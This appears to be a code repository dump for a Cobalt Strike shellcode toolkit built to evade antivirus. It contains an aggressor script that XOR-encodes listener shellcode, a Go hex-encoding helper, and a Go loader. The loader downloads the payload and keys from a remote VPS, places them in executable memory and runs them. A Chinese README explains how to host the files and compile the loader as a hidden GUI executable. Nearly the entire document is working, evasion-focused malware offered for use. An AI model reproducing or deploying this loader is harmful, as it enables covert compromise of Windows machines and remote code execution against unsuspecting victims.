├── .gitattributes ├── Bypass_make.cna ├── README.md ├── process_shellcode.go └── shellcode_loader.go /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Bypass_make.cna: -------------------------------------------------------------------------------- 1 | popup attacks{ 2 | item("&BypassShellCode",{Generator();}); 3 | } 4 | 5 | bind Ctrl+G{ 6 | Generator(); 7 | } 8 | 9 | sub Generator{ 10 | $dialog = dialog("Generator", %(listener => "" , bit => false), &build); 11 | drow_listener($dialog, "listener", "Listener: "); 12 | dialog_description($dialog, "该插件用于快速生成免杀的shellcode"); 13 | dbutton_action($dialog, "Generate"); 14 | drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload"); 15 | dialog_show($dialog); 16 | } 17 | 18 | sub build{ 19 | $a = $3["bit"] . ""; 20 | 21 | if ($3["bit"] eq "false"){ 22 | $system = "x86"; 23 | $arch = "386"; 24 | }else{ 25 | $system = "x64"; 26 | $arch = "amd64"; 27 | } 28 | 29 | $KEY_1 = rand(255); 30 | $KEY_2 = rand(255); 31 | $shell_code = shellcode($3["listener"], false, $system); 32 | $shell_code = split("",$shell_code); 33 | $arr = ""; 34 | 35 | for ($i = 0; $i < size($shell_code); $i++){ 36 | if ($i eq 0) { 37 | $arr = $arr .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2; 38 | } else { 39 | $arr = $arr . "," .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2; 40 | } 41 | } 42 | 43 | prompt_file_save("shellcode.txt", { 44 | $path = "$1"; 45 | $handle = openf("> $+ $1"); 46 | writeb($handle, "Key1: " . $KEY_1 . "\r\n"); 47 | writeb($handle, "Key2: " . $KEY_2 . "\r\n"); 48 | writeb($handle, $arr); 49 | closef($handle); 50 | show_message("save to $+ $1\r\nKey1: $KEY_1\r\nKey2: $KEY_2"); 51 | }); 52 | } 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 1. CS加载Bypass_make.cna插件,生成shellcode和加密key1、key2: 2 | "Attack" > "BypassShellCode" 3 | 4 | 2. 将得到的shellcode和key的值分别做加密: 5 | process_shellcode.exe shellcode > code.txt 6 | process_shellcode.exe key1 > k1.txt 7 | process_shellcode.exe key2 > k2.txt 8 | 9 | 3. 得到的三个结果分别手动保存为文件放在vps上 10 | code.txt 11 | k1.txt 12 | k2.txt 13 | 14 | 4. 修改shellcode_loader.go中的vps请求地址即可: 15 | ``` 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory") 21 | URI = "http://vps:80/" 22 | ) 23 | ``` 24 | 25 | 6. 编译go文件: 26 | go build -ldflags "-H windowsgui" shellcode_loader.go 27 | 28 | 7. 运行shellcode_loader.exe即可 29 | -------------------------------------------------------------------------------- /process_shellcode.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "encoding/hex" 6 | "os" 7 | "strings" 8 | "strconv" 9 | ) 10 | 11 | func main() { 12 | param := os.Args[1] 13 | isArr := strings.Contains(param, ",") 14 | if isArr { 15 | context := strings.Split(param, ",") 16 | size := len(context) 17 | dataArr := make([]byte, size) 18 | for i, v := range context { 19 | val, _ := strconv.Atoi(v) 20 | dataArr[i] = byte(val) 21 | } 22 | //fmt.Println(dataArr) 23 | // hexToString 24 | fmt.Println(hex.EncodeToString([]byte(dataArr))) 25 | } else { 26 | val, _ := strconv.Atoi(param) 27 | data := make([]byte, 1) 28 | data[0] = byte(val) 29 | //fmt.Println(data) 30 | // hexToString 31 | fmt.Println(hex.EncodeToString([]byte(data))) 32 | } 33 | } -------------------------------------------------------------------------------- /shellcode_loader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/hex" 5 | "io/ioutil" 6 | "net/http" 7 | "syscall" 8 | "time" 9 | "unsafe" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 22 | RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory") 23 | URI = "http://xxx:80/download/" 24 | ) 25 | 26 | func keys1() byte { 27 | time.Sleep(5 * time.Second) 28 | resp, _ := http.Get(URI + "k1.txt") 29 | defer resp.Body.Close() 30 | body, _ := ioutil.ReadAll(resp.Body) 31 | var tmp = string(body) 32 | x1, _ := hex.DecodeString(tmp) 33 | return x1[0] 34 | } 35 | 36 | func keys2() byte { 37 | time.Sleep(5 * time.Second) 38 | resp, _ := http.Get(URI + "k2.txt") 39 | defer resp.Body.Close() 40 | body, _ := ioutil.ReadAll(resp.Body) 41 | var tmp = string(body) 42 | x1, _ := hex.DecodeString(tmp) 43 | return x1[0] 44 | } 45 | 46 | func main() { 47 | time.Sleep(5 * time.Second) 48 | resp, err := http.Get(URI + "code.txt") 49 | if err != nil { 50 | print(err) 51 | return 52 | } 53 | defer resp.Body.Close() 54 | body, _ := ioutil.ReadAll(resp.Body) 55 | var tmp = string(body) 56 | x1, _ := hex.DecodeString(tmp) 57 | 58 | var key1 byte = keys1() 59 | var key2 byte = keys2() 60 | var res []byte 61 | for i := 0; i < len(x1); i++ { 62 | res = append(res, x1[i]^key1^key2) 63 | } 64 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(res)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 65 | if err != nil && err.Error() != "The operation completed successfully." { 66 | syscall.Exit(0) 67 | } 68 | _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&res[0])), uintptr(len(res))) 69 | if err != nil && err.Error() != "The operation completed successfully." { 70 | syscall.Exit(0) 71 | } 72 | time.Sleep(5 * time.Second) 73 | syscall.Syscall(addr, 0, 0, 0, 0) 74 | } 75 | --------------------------------------------------------------------------------